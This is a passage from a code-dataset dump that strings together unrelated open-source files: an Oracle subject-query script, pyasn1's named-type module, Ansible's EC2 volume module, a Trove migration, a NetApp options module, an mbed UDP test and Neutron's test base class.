A1, msg_A=msg_A) if __name__ == '__main__': #gr_unittest.run(test_multiply_matrix_ff, "test_multiply_matrix_ff.xml") gr_unittest.run(test_multiply_matrix_ff)
gpl-3.0
uwosh/Campus_Directory_web_service
getAllSubjectsCX.py
1
1441
# getAllSubjectsCX import re import xmlrpclib import cx_Oracle Kim_Nguyen_G5 = '192.168.0.1' Kim_Nguyen_iMac = '192.168.0.1' Kim_Nguyen_MacBook = '192.168.0.1' Plone1 = '192.168.0.1' Plone3 = '192.168.0.1' def getAllSubjectsCX (self, usexml): request = self.REQUEST RESPONSE = request.RESPONSE remote_addr = request.REMOTE_ADDR if remote_addr in [Kim_Nguyen_iMac, Kim_Nguyen_MacBook, '127.0.0.1', Plone3 ]: file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_NGUYEN_PRD.txt', 'r') for line in file.readlines(): if line <> "" and not line.startswith('#'): connString = line file.close() connection = cx_Oracle.connect(connString) cursor = connection.cursor() #cursor.execute("""select distinct(subject) from ps_class_tbl order by subject""") cursor.execute("""select distinct subject, descr from ps_subject_tbl s1 where s1.eff_status = 'A' and s1.effdt = (select max(s2.effdt) from ps_subject_tbl s2 where s1.subject = s2.subject and s2.eff_status = 'A' and s1.institution = s2.institution and s1.acad_org = s2.acad_org)""") retlist = [] for column_1, column_2 in cursor: retlist.append([column_1, column_2,]) if usexml == "0": return retlist else: myMarshaller = xmlrpclib.Marshaller() return myMarshaller.dumps(retlist)
gpl-2.0
crs4/ProMort
promort/utils/__init__.py
42
1098
# Copyright (c) 2019, CRS4 # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
mit
SecWiki/windows-kernel-exploits
MS14-068/pykek/pyasn1/type/namedtype.py
200
4794
# NamedType specification for constructed types import sys from pyasn1.type import tagmap from pyasn1 import error class NamedType: isOptional = 0 isDefaulted = 0 def __init__(self, name, t): self.__name = name; self.__type = t def __repr__(self): return '%s(%s, %s)' % ( self.__class__.__name__, self.__name, self.__type ) def getType(self): return self.__type def getName(self): return self.__name def __getitem__(self, idx): if idx == 0: return self.__name if idx == 1: return self.__type raise IndexError() class OptionalNamedType(NamedType): isOptional = 1 class DefaultedNamedType(NamedType): isDefaulted = 1 class NamedTypes: def __init__(self, *namedTypes): self.__namedTypes = namedTypes self.__namedTypesLen = len(self.__namedTypes) self.__minTagSet = None self.__tagToPosIdx = {}; self.__nameToPosIdx = {} self.__tagMap = { False: None, True: None } self.__ambigiousTypes = {} def __repr__(self): r = '%s(' % self.__class__.__name__ for n in self.__namedTypes: r = r + '%r, ' % (n,) return r + ')' def __getitem__(self, idx): return self.__namedTypes[idx] if sys.version_info[0] <= 2: def __nonzero__(self): return bool(self.__namedTypesLen) else: def __bool__(self): return bool(self.__namedTypesLen) def __len__(self): return self.__namedTypesLen def getTypeByPosition(self, idx): if idx < 0 or idx >= self.__namedTypesLen: raise error.PyAsn1Error('Type position out of range') else: return self.__namedTypes[idx].getType() def getPositionByType(self, tagSet): if not self.__tagToPosIdx: idx = self.__namedTypesLen while idx > 0: idx = idx - 1 tagMap = self.__namedTypes[idx].getType().getTagMap() for t in tagMap.getPosMap(): if t in self.__tagToPosIdx: raise error.PyAsn1Error('Duplicate type %s' % (t,)) self.__tagToPosIdx[t] = idx try: return self.__tagToPosIdx[tagSet] except KeyError: raise error.PyAsn1Error('Type %s not found' % (tagSet,)) def getNameByPosition(self, idx): try: return self.__namedTypes[idx].getName() except IndexError: raise error.PyAsn1Error('Type position out of range') def getPositionByName(self, name): if not self.__nameToPosIdx: idx = self.__namedTypesLen while idx > 0: idx = idx - 1 n = self.__namedTypes[idx].getName() if n in self.__nameToPosIdx: raise error.PyAsn1Error('Duplicate name %s' % (n,)) self.__nameToPosIdx[n] = idx try: return self.__nameToPosIdx[name] except KeyError: raise error.PyAsn1Error('Name %s not found' % (name,)) def __buildAmbigiousTagMap(self): ambigiousTypes = () idx = self.__namedTypesLen while idx > 0: idx = idx - 1 t = self.__namedTypes[idx] if t.isOptional or t.isDefaulted: ambigiousTypes = (t, ) + ambigiousTypes else: ambigiousTypes = (t, ) self.__ambigiousTypes[idx] = NamedTypes(*ambigiousTypes) def getTagMapNearPosition(self, idx): if not self.__ambigiousTypes: self.__buildAmbigiousTagMap() try: return self.__ambigiousTypes[idx].getTagMap() except KeyError: raise error.PyAsn1Error('Type position out of range') def getPositionNearType(self, tagSet, idx): if not self.__ambigiousTypes: self.__buildAmbigiousTagMap() try: return idx+self.__ambigiousTypes[idx].getPositionByType(tagSet) except KeyError: raise error.PyAsn1Error('Type position out of range') def genMinTagSet(self): if self.__minTagSet is None: for t in self.__namedTypes: __type = t.getType() tagSet = getattr(__type,'getMinTagSet',__type.getTagSet)() if self.__minTagSet is None or tagSet < self.__minTagSet: self.__minTagSet = tagSet return self.__minTagSet def getTagMap(self, uniq=False): if self.__tagMap[uniq] is None: tagMap = tagmap.TagMap() for nt in self.__namedTypes: tagMap = tagMap.clone( nt.getType(), nt.getType().getTagMap(), uniq ) self.__tagMap[uniq] = tagMap return self.__tagMap[uniq]
mit
cooniur/ansible-modules-core
cloud/amazon/ec2_vol.py
11
19254
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: ec2_vol short_description: create and attach a volume, return volume id and device map description: - creates an EBS volume and optionally attaches it to an instance. If both an instance ID and a device name is given and the instance has a device at the device name, then no volume is created and no attachment is made. This module has a dependency on python-boto. version_added: "1.1" options: instance: description: - instance ID if you wish to attach the volume. Since 1.9 you can set to None to detach. required: false default: null name: description: - volume Name tag if you wish to attach an existing volume (requires instance) required: false default: null version_added: "1.6" id: description: - volume id if you wish to attach an existing volume (requires instance) or remove an existing volume required: false default: null version_added: "1.6" volume_size: description: - size of volume (in GB) to create. required: false default: null volume_type: description: - Type of EBS volume; standard (magnetic), gp2 (SSD), io1 (Provisioned IOPS). "Standard" is the old EBS default and continues to remain the Ansible default for backwards compatibility. required: false default: standard version_added: "1.9" iops: description: - the provisioned IOPs you want to associate with this volume (integer). required: false default: 100 version_added: "1.3" encrypted: description: - Enable encryption at rest for this volume. default: false version_added: "1.8" device_name: description: - device id to override device mapping. Assumes /dev/sdf for Linux/UNIX and /dev/xvdf for Windows. required: false default: null delete_on_termination: description: - When set to "yes", the volume will be deleted upon instance termination. required: false default: "no" choices: ["yes", "no"] version_added: "2.1" zone: description: - zone in which to create the volume, if unset uses the zone the instance is in (if set) required: false default: null aliases: ['aws_zone', 'ec2_zone'] snapshot: description: - snapshot ID on which to base the volume required: false default: null version_added: "1.5" validate_certs: description: - When set to "no", SSL certificates will not be validated for boto versions >= 2.6.0. required: false default: "yes" choices: ["yes", "no"] version_added: "1.5" state: description: - whether to ensure the volume is present or absent, or to list existing volumes (The C(list) option was added in version 1.8). required: false default: present choices: ['absent', 'present', 'list'] version_added: "1.6" author: "Lester Wade (@lwade)" extends_documentation_fragment: - aws - ec2 ''' EXAMPLES = ''' # Simple attachment action - ec2_vol: instance: XXXXXX volume_size: 5 device_name: sdd # Example using custom iops params - ec2_vol: instance: XXXXXX volume_size: 5 iops: 100 device_name: sdd # Example using snapshot id - ec2_vol: instance: XXXXXX snapshot: "{{ snapshot }}" # Playbook example combined with instance launch - ec2: keypair: "{{ keypair }}" image: "{{ image }}" wait: yes count: 3 register: ec2 - ec2_vol: instance: "{{ item.id }} " volume_size: 5 with_items: "{{ ec2.instances }}" register: ec2_vol # Example: Launch an instance and then add a volume if not already attached # * Volume will be created with the given name if not already created. # * Nothing will happen if the volume is already attached. # * Requires Ansible 2.0 - ec2: keypair: "{{ keypair }}" image: "{{ image }}" zone: YYYYYY id: my_instance wait: yes count: 1 register: ec2 - ec2_vol: instance: "{{ item.id }}" name: my_existing_volume_Name_tag device_name: /dev/xvdf with_items: "{{ ec2.instances }}" register: ec2_vol # Remove a volume - ec2_vol: id: vol-XXXXXXXX state: absent # Detach a volume (since 1.9) - ec2_vol: id: vol-XXXXXXXX instance: None # List volumes for an instance - ec2_vol: instance: i-XXXXXX state: list # Create new volume using SSD storage - ec2_vol: instance: XXXXXX volume_size: 50 volume_type: gp2 device_name: /dev/xvdf # Attach an existing volume to instance. The volume will be deleted upon instance termination. - ec2_vol: instance: XXXXXX id: XXXXXX device_name: /dev/sdf delete_on_termination: yes ''' RETURN = ''' device: description: device name of attached volume returned: when success type: string sample: "/def/sdf" volume_id: description: the id of volume returned: when success type: string sample: "vol-35b333d9" volume_type: description: the volume type returned: when success type: string sample: "standard" volume: description: a dictionary containing detailed attributes of the volume returned: when success type: string sample: { "attachment_set": { "attach_time": "2015-10-23T00:22:29.000Z", "deleteOnTermination": "false", "device": "/dev/sdf", "instance_id": "i-8356263c", "status": "attached" }, "create_time": "2015-10-21T14:36:08.870Z", "encrypted": false, "id": "vol-35b333d9", "iops": null, "size": 1, "snapshot_id": "", "status": "in-use", "tags": { "env": "dev" }, "type": "standard", "zone": "us-east-1b" } ''' import time from distutils.version import LooseVersion try: import boto.ec2 from boto.exception import BotoServerError from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping HAS_BOTO = True except ImportError: HAS_BOTO = False def get_volume(module, ec2): name = module.params.get('name') id = module.params.get('id') zone = module.params.get('zone') filters = {} volume_ids = None # If no name or id supplied, just try volume creation based on module parameters if id is None and name is None: return None if zone: filters['availability_zone'] = zone if name: filters = {'tag:Name': name} if id: volume_ids = [id] try: vols = ec2.get_all_volumes(volume_ids=volume_ids, filters=filters) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if not vols: if id: msg = "Could not find the volume with id: %s" % id if name: msg += (" and name: %s" % name) module.fail_json(msg=msg) else: return None if len(vols) > 1: module.fail_json(msg="Found more than one volume in zone (if specified) with name: %s" % name) return vols[0] def get_volumes(module, ec2): instance = module.params.get('instance') try: if not instance: vols = ec2.get_all_volumes() else: vols = ec2.get_all_volumes(filters={'attachment.instance-id': instance}) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return vols def delete_volume(module, ec2): volume_id = module.params['id'] try: ec2.delete_volume(volume_id) module.exit_json(changed=True) except boto.exception.EC2ResponseError as ec2_error: if ec2_error.code == 'InvalidVolume.NotFound': module.exit_json(changed=False) module.fail_json(msg=ec2_error.message) def boto_supports_volume_encryption(): """ Check if Boto library supports encryption of EBS volumes (added in 2.29.0) Returns: True if boto library has the named param as an argument on the request_spot_instances method, else False """ return hasattr(boto, 'Version') and LooseVersion(boto.Version) >= LooseVersion('2.29.0') def create_volume(module, ec2, zone): changed = False name = module.params.get('name') iops = module.params.get('iops') encrypted = module.params.get('encrypted') volume_size = module.params.get('volume_size') volume_type = module.params.get('volume_type') snapshot = module.params.get('snapshot') # If custom iops is defined we use volume_type "io1" rather than the default of "standard" if iops: volume_type = 'io1' volume = get_volume(module, ec2) if volume is None: try: if boto_supports_volume_encryption(): volume = ec2.create_volume(volume_size, zone, snapshot, volume_type, iops, encrypted) changed = True else: volume = ec2.create_volume(volume_size, zone, snapshot, volume_type, iops) changed = True while volume.status != 'available': time.sleep(3) volume.update() if name: ec2.create_tags([volume.id], {"Name": name}) except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return volume, changed def attach_volume(module, ec2, volume, instance): device_name = module.params.get('device_name') delete_on_termination = module.params.get('delete_on_termination') changed = False # If device_name isn't set, make a choice based on best practices here: # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/block-device-mapping-concepts.html # In future this needs to be more dynamic but combining block device mapping best practices # (bounds for devices, as above) with instance.block_device_mapping data would be tricky. For me ;) # Use password data attribute to tell whether the instance is Windows or Linux if device_name is None: try: if not ec2.get_password_data(instance.id): device_name = '/dev/sdf' else: device_name = '/dev/xvdf' except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if volume.attachment_state() is not None: adata = volume.attach_data if adata.instance_id != instance.id: module.fail_json(msg = "Volume %s is already attached to another instance: %s" % (volume.id, adata.instance_id)) else: # Volume is already attached to right instance changed = modify_dot_attribute(module, ec2, instance, device_name) else: try: volume.attach(instance.id, device_name) while volume.attachment_state() != 'attached': time.sleep(3) volume.update() changed = True except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) modify_dot_attribute(module, ec2, instance, device_name) return volume, changed def modify_dot_attribute(module, ec2, instance, device_name): """ Modify delete_on_termination attribute """ delete_on_termination = module.params.get('delete_on_termination') changed = False try: instance.update() dot = instance.block_device_mapping[device_name].delete_on_termination except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) if delete_on_termination != dot: try: bdt = BlockDeviceType(delete_on_termination=delete_on_termination) bdm = BlockDeviceMapping() bdm[device_name] = bdt ec2.modify_instance_attribute(instance_id=instance.id, attribute='blockDeviceMapping', value=bdm) while instance.block_device_mapping[device_name].delete_on_termination != delete_on_termination: time.sleep(3) instance.update() changed = True except boto.exception.BotoServerError as e: module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message)) return changed def detach_volume(module, ec2, volume): changed = False if volume.attachment_state() is not None: adata = volume.attach_data volume.detach() while volume.attachment_state() is not None: time.sleep(3) volume.update() changed = True return volume, changed def get_volume_info(volume, state): # If we're just listing volumes then do nothing, else get the latest update for the volume if state != 'list': volume.update() volume_info = {} attachment = volume.attach_data volume_info = { 'create_time': volume.create_time, 'encrypted': volume.encrypted, 'id': volume.id, 'iops': volume.iops, 'size': volume.size, 'snapshot_id': volume.snapshot_id, 'status': volume.status, 'type': volume.type, 'zone': volume.zone, 'attachment_set': { 'attach_time': attachment.attach_time, 'device': attachment.device, 'instance_id': attachment.instance_id, 'status': attachment.status }, 'tags': volume.tags } if hasattr(attachment, 'deleteOnTermination'): volume_info['attachment_set']['deleteOnTermination'] = attachment.deleteOnTermination return volume_info def main(): argument_spec = ec2_argument_spec() argument_spec.update(dict( instance = dict(), id = dict(), name = dict(), volume_size = dict(), volume_type = dict(choices=['standard', 'gp2', 'io1'], default='standard'), iops = dict(), encrypted = dict(type='bool', default=False), device_name = dict(), delete_on_termination = dict(type='bool', default=False), zone = dict(aliases=['availability_zone', 'aws_zone', 'ec2_zone']), snapshot = dict(), state = dict(choices=['absent', 'present', 'list'], default='present') ) ) module = AnsibleModule(argument_spec=argument_spec) if not HAS_BOTO: module.fail_json(msg='boto required for this module') id = module.params.get('id') name = module.params.get('name') instance = module.params.get('instance') volume_size = module.params.get('volume_size') encrypted = module.params.get('encrypted') device_name = module.params.get('device_name') zone = module.params.get('zone') snapshot = module.params.get('snapshot') state = module.params.get('state') # Ensure we have the zone or can get the zone if instance is None and zone is None and state == 'present': module.fail_json(msg="You must specify either instance or zone") # Set volume detach flag if instance == 'None' or instance == '': instance = None detach_vol_flag = True else: detach_vol_flag = False # Set changed flag changed = False region, ec2_url, aws_connect_params = get_aws_connection_info(module) if region: try: ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params) except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e: module.fail_json(msg=str(e)) else: module.fail_json(msg="region must be specified") if state == 'list': returned_volumes = [] vols = get_volumes(module, ec2) for v in vols: attachment = v.attach_data returned_volumes.append(get_volume_info(v, state)) module.exit_json(changed=False, volumes=returned_volumes) if encrypted and not boto_supports_volume_encryption(): module.fail_json(msg="You must use boto >= v2.29.0 to use encrypted volumes") # Here we need to get the zone info for the instance. This covers situation where # instance is specified but zone isn't. # Useful for playbooks chaining instance launch with volume create + attach and where the # zone doesn't matter to the user. inst = None if instance: try: reservation = ec2.get_all_instances(instance_ids=instance) except BotoServerError as e: module.fail_json(msg=e.message) inst = reservation[0].instances[0] zone = inst.placement # Check if there is a volume already mounted there. if device_name: if device_name in inst.block_device_mapping: module.exit_json(msg="Volume mapping for %s already exists on instance %s" % (device_name, instance), volume_id=inst.block_device_mapping[device_name].volume_id, device=device_name, changed=False) # Delaying the checks until after the instance check allows us to get volume ids for existing volumes # without needing to pass an unused volume_size if not volume_size and not (id or name or snapshot): module.fail_json(msg="You must specify volume_size or identify an existing volume by id, name, or snapshot") if volume_size and (id or snapshot): module.fail_json(msg="Cannot specify volume_size together with id or snapshot") if state == 'present': volume, changed = create_volume(module, ec2, zone) if detach_vol_flag: volume, changed = detach_volume(module, ec2, volume) elif inst is not None: volume, changed = attach_volume(module, ec2, volume, inst) # Add device, volume_id and volume_type parameters separately to maintain backward compatability volume_info = get_volume_info(volume, state) module.exit_json(changed=changed, volume=volume_info, device=volume_info['attachment_set']['device'], volume_id=volume_info['id'], volume_type=volume_info['type']) elif state == 'absent': delete_volume(module, ec2) # import module snippets from ansible.module_utils.basic import * from ansible.module_utils.ec2 import * if __name__ == '__main__': main()
gpl-3.0
hplustree/trove
trove/db/sqlalchemy/migrate_repo/versions/025_add_service_statuses_indexes.py
4
1221
# Copyright 2014 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_log import log as logging from sqlalchemy.exc import OperationalError from sqlalchemy.schema import Index from sqlalchemy.schema import MetaData from trove.db.sqlalchemy.migrate_repo.schema import Table logger = logging.getLogger('trove.db.sqlalchemy.migrate_repo.schema') def upgrade(migrate_engine): meta = MetaData() meta.bind = migrate_engine service_statuses = Table('service_statuses', meta, autoload=True) idx = Index("service_statuses_instance_id", service_statuses.c.instance_id) try: idx.create() except OperationalError as e: logger.info(e)
apache-2.0
dockerera/func
func/minion/modules/netapp/options.py
5
1483
## ## NetApp Filer 'options' Module ## ## Copyright 2008, Red Hat, Inc ## John Eckersberg <[email protected]> ## ## This software may be freely redistributed under the terms of the GNU ## general public license. ## ## You should have received a copy of the GNU General Public License ## along with this program; if not, write to the Free Software ## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. ## from func.minion.modules import func_module from func.minion.modules.netapp.common import * class Options(func_module.FuncModule): # Update these if need be. version = "0.0.1" api_version = "0.0.1" description = "Interface to the 'options' command" def get(self, filer, filter=''): """ TODO: Document me ... """ cmd_opts = ['options', filter] output = ssh(filer, cmd_opts) if 'No such option' in output: return output.strip() result = {} for line in output.split('\n'): if not line: continue tokens = line.split() try: result[tokens[0]] = tokens[1] except: result[tokens[0]] = '' return result def set(self, filer, option, value): """ TODO: Document me ... """ cmd_opts = ['options', option, value] output = ssh(filer, cmd_opts) # should return no output (maybe a space or newline) return check_output("^\s*$", output)
gpl-2.0
ivanalejandro0/bitmask_client
src/leap/bitmask/logs/streamtologger.py
8
2008
# -*- coding: utf-8 -*- # streamtologger.py # Copyright (C) 2013 LEAP # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ Stream object that redirects writes to a logger instance. """ import logging class StreamToLogger(object): """ Fake file-like stream object that redirects writes to a logger instance. Credits to: http://www.electricmonk.nl/log/2011/08/14/\ redirect-stdout-and-stderr-to-a-logger-in-python/ """ def __init__(self, logger, log_level=logging.INFO): """ Constructor, defines the logger and level to use to log messages. :param logger: logger object to log messages. :type logger: logging.Handler :param log_level: the level to use to log messages through the logger. :type log_level: int look at logging-levels in 'logging' docs. """ self._logger = logger self._log_level = log_level def write(self, data): """ Simulates the 'write' method in a file object. It writes the data receibed in buf to the logger 'self._logger'. :param data: data to write to the 'file' :type data: str """ for line in data.rstrip().splitlines(): self._logger.log(self._log_level, line.rstrip()) def flush(self): """ Dummy method. Needed to replace the twisted.log output. """ pass
gpl-3.0
domenicosolazzo/jroc
tests/jroc/nlp/pos/nltk/test_taggerstorage.py
1
1821
# -*- coding: utf-8 -*- from . import TaggerStorageAdapter import unittest import os import codecs class TaggerStorageAdapterTestCase(unittest.TestCase): taggerStorage = TaggerStorageAdapter() currentDirectory = "%s" % (os.path.dirname(os.path.realpath(__file__)), ) testTextsDirectory = "%s/../../../../data/text/" % (currentDirectory, ) def setUp(self): text = "Det er norsk" self.taggerStorage = TaggerStorageAdapter() def tearDown(self): #self.obtManager.cleanUp() self.taggerStorage = None def test_pos_initizialize(self): """ Check if the initialization works """ result = self.taggerStorage.getTagger() self.assertTrue(result is not None) def test_pos_initizialize_with_aubt(self): """ Check if the initialization works with AUBT """ self.taggerStorage = TaggerStorageAdapter(model='aubt') result = self.taggerStorage.getTagger() self.assertTrue(result is not None) def test_pos_classifier_text_english(self): """ Test the classifier tagger with an english text """ text = self.helper_readFilename("en/article1.txt") text = text.decode('utf-8').split() result = self.taggerStorage.getTagger().tag(text) expected = (u'Congress\u2019s', u'NNP') self.assertTrue(isinstance(result, list)) self.assertTrue(len(result) > 0) self.assertEqual(expected, result[0]) def helper_readFilename(self, filename=''): stopwords = [] if not filename: raise Exception("The file is empty") fileToRead = "%s%s" % (self.testTextsDirectory, filename) with open(fileToRead) as f: text = f.read() #f.close() return text
gpl-3.0
karsev/mbed-os
TESTS/netsocket/host_tests/udp_shotgun.py
39
4553
""" mbed SDK Copyright (c) 2011-2013 ARM Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import sys import socket import json import random import itertools import time from sys import stdout from threading import Thread from SocketServer import BaseRequestHandler, UDPServer from mbed_host_tests import BaseHostTest, event_callback class UDPEchoClientHandler(BaseRequestHandler): def handle(self): """ UDP packet handler. Responds with multiple simultaneous packets """ data, sock = self.request pattern = [ord(d) << 4 for d in data] # Each byte in request indicates size of packet to recieve # Each packet size is shifted over by 4 to fit in a byte, which # avoids any issues with endianess or decoding for packet in pattern: data = [random.randint(0, 255) for _ in range(packet-1)] data.append(reduce(lambda a,b: a^b, data)) data = ''.join(map(chr, data)) sock.sendto(data, self.client_address) # Sleep a tiny bit to compensate for local network time.sleep(0.01) class UDPEchoClientTest(BaseHostTest): def __init__(self): """ Initialise test parameters. :return: """ BaseHostTest.__init__(self) self.SERVER_IP = None # Will be determined after knowing the target IP self.SERVER_PORT = 0 # Let TCPServer choose an arbitrary port self.server = None self.server_thread = None self.target_ip = None @staticmethod def find_interface_to_target_addr(target_ip): """ Finds IP address of the interface through which it is connected to the target. :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect((target_ip, 0)) # Target IP, any port except socket.error: s.connect((target_ip, 8000)) # Target IP, 'random' port ip = s.getsockname()[0] s.close() return ip def setup_udp_server(self): """ sets up a UDP server for target to connect and send test data. :return: """ # !NOTE: There should mechanism to assert in the host test if self.SERVER_IP is None: self.log("setup_udp_server() called before determining server IP!") self.notify_complete(False) # Returning none will suppress host test from printing success code self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler) ip, port = self.server.server_address self.SERVER_PORT = port self.server.allow_reuse_address = True self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT)) self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,)) self.server_thread.start() @staticmethod def server_thread_func(this): """ Thread function to run TCP server forever. :param this: :return: """ this.server.serve_forever() @event_callback("target_ip") def _callback_target_ip(self, key, value, timestamp): """ Callback to handle reception of target's IP address. :param key: :param value: :param timestamp: :return: """ self.target_ip = value self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip) self.setup_udp_server() @event_callback("host_ip") def _callback_host_ip(self, key, value, timestamp): """ Callback for request for host IP Addr """ self.send_kv("host_ip", self.SERVER_IP) @event_callback("host_port") def _callback_host_port(self, key, value, timestamp): """ Callback for request for host port """ self.send_kv("host_port", self.SERVER_PORT) def teardown(self): if self.server: self.server.shutdown() self.server_thread.join()
apache-2.0
pnavarro/neutron
neutron/tests/base.py
1
13886
# Copyright 2010-2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Base test cases for all neutron tests. """ import contextlib import gc import logging as std_logging import os import os.path import random import traceback import weakref import eventlet.timeout import fixtures import mock from oslo_concurrency.fixture import lockutils from oslo_config import cfg from oslo_messaging import conffixture as messaging_conffixture from oslo_utils import strutils import testtools from neutron.agent.linux import external_process from neutron.common import config from neutron.common import rpc as n_rpc from neutron.db import agentschedulers_db from neutron import manager from neutron import policy from neutron.tests import fake_notifier from neutron.tests import post_mortem_debug CONF = cfg.CONF CONF.import_opt('state_path', 'neutron.common.config') LOG_FORMAT = "%(asctime)s %(levelname)8s [%(name)s] %(message)s" ROOTDIR = os.path.dirname(__file__) ETCDIR = os.path.join(ROOTDIR, 'etc') def etcdir(*p): return os.path.join(ETCDIR, *p) def fake_use_fatal_exceptions(*args): return True def fake_consume_in_threads(self): return [] def get_rand_name(max_length=None, prefix='test'): """Return a random string. The string will start with 'prefix' and will be exactly 'max_length'. If 'max_length' is None, then exactly 8 random characters, each hexadecimal, will be added. In case len(prefix) <= len(max_length), ValueError will be raised to indicate the problem. """ if max_length: length = max_length - len(prefix) if length <= 0: raise ValueError("'max_length' must be bigger than 'len(prefix)'.") suffix = ''.join(str(random.randint(0, 9)) for i in range(length)) else: suffix = hex(random.randint(0x10000000, 0x7fffffff))[2:] return prefix + suffix def bool_from_env(key, strict=False, default=False): value = os.environ.get(key) return strutils.bool_from_string(value, strict=strict, default=default) def get_test_timeout(default=0): return int(os.environ.get('OS_TEST_TIMEOUT', 0)) class AttributeDict(dict): """ Provide attribute access (dict.key) to dictionary values. """ def __getattr__(self, name): """Allow attribute access for all keys in the dict.""" if name in self: return self[name] raise AttributeError(_("Unknown attribute '%s'.") % name) class DietTestCase(testtools.TestCase): """Same great taste, less filling. BaseTestCase is responsible for doing lots of plugin-centric setup that not all tests require (or can tolerate). This class provides only functionality that is common across all tests. """ def setUp(self): super(DietTestCase, self).setUp() # Configure this first to ensure pm debugging support for setUp() debugger = os.environ.get('OS_POST_MORTEM_DEBUGGER') if debugger: self.addOnException(post_mortem_debug.get_exception_handler( debugger)) if bool_from_env('OS_DEBUG'): _level = std_logging.DEBUG else: _level = std_logging.INFO capture_logs = bool_from_env('OS_LOG_CAPTURE') if not capture_logs: std_logging.basicConfig(format=LOG_FORMAT, level=_level) self.log_fixture = self.useFixture( fixtures.FakeLogger( format=LOG_FORMAT, level=_level, nuke_handlers=capture_logs, )) test_timeout = get_test_timeout() if test_timeout == -1: test_timeout = 0 if test_timeout > 0: self.useFixture(fixtures.Timeout(test_timeout, gentle=True)) # If someone does use tempfile directly, ensure that it's cleaned up self.useFixture(fixtures.NestedTempfile()) self.useFixture(fixtures.TempHomeDir()) self.addCleanup(mock.patch.stopall) if bool_from_env('OS_STDOUT_CAPTURE'): stdout = self.useFixture(fixtures.StringStream('stdout')).stream self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout)) if bool_from_env('OS_STDERR_CAPTURE'): stderr = self.useFixture(fixtures.StringStream('stderr')).stream self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr)) self.addOnException(self.check_for_systemexit) def check_for_systemexit(self, exc_info): if isinstance(exc_info[1], SystemExit): self.fail("A SystemExit was raised during the test. %s" % traceback.format_exception(*exc_info)) @contextlib.contextmanager def assert_max_execution_time(self, max_execution_time=5): with eventlet.timeout.Timeout(max_execution_time, False): yield return self.fail('Execution of this test timed out') def assertOrderedEqual(self, expected, actual): expect_val = self.sort_dict_lists(expected) actual_val = self.sort_dict_lists(actual) self.assertEqual(expect_val, actual_val) def 